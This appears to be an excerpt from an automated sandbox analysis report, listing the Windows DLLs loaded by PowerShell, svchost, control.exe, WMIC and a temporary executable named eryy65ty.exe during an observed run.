Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\control.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
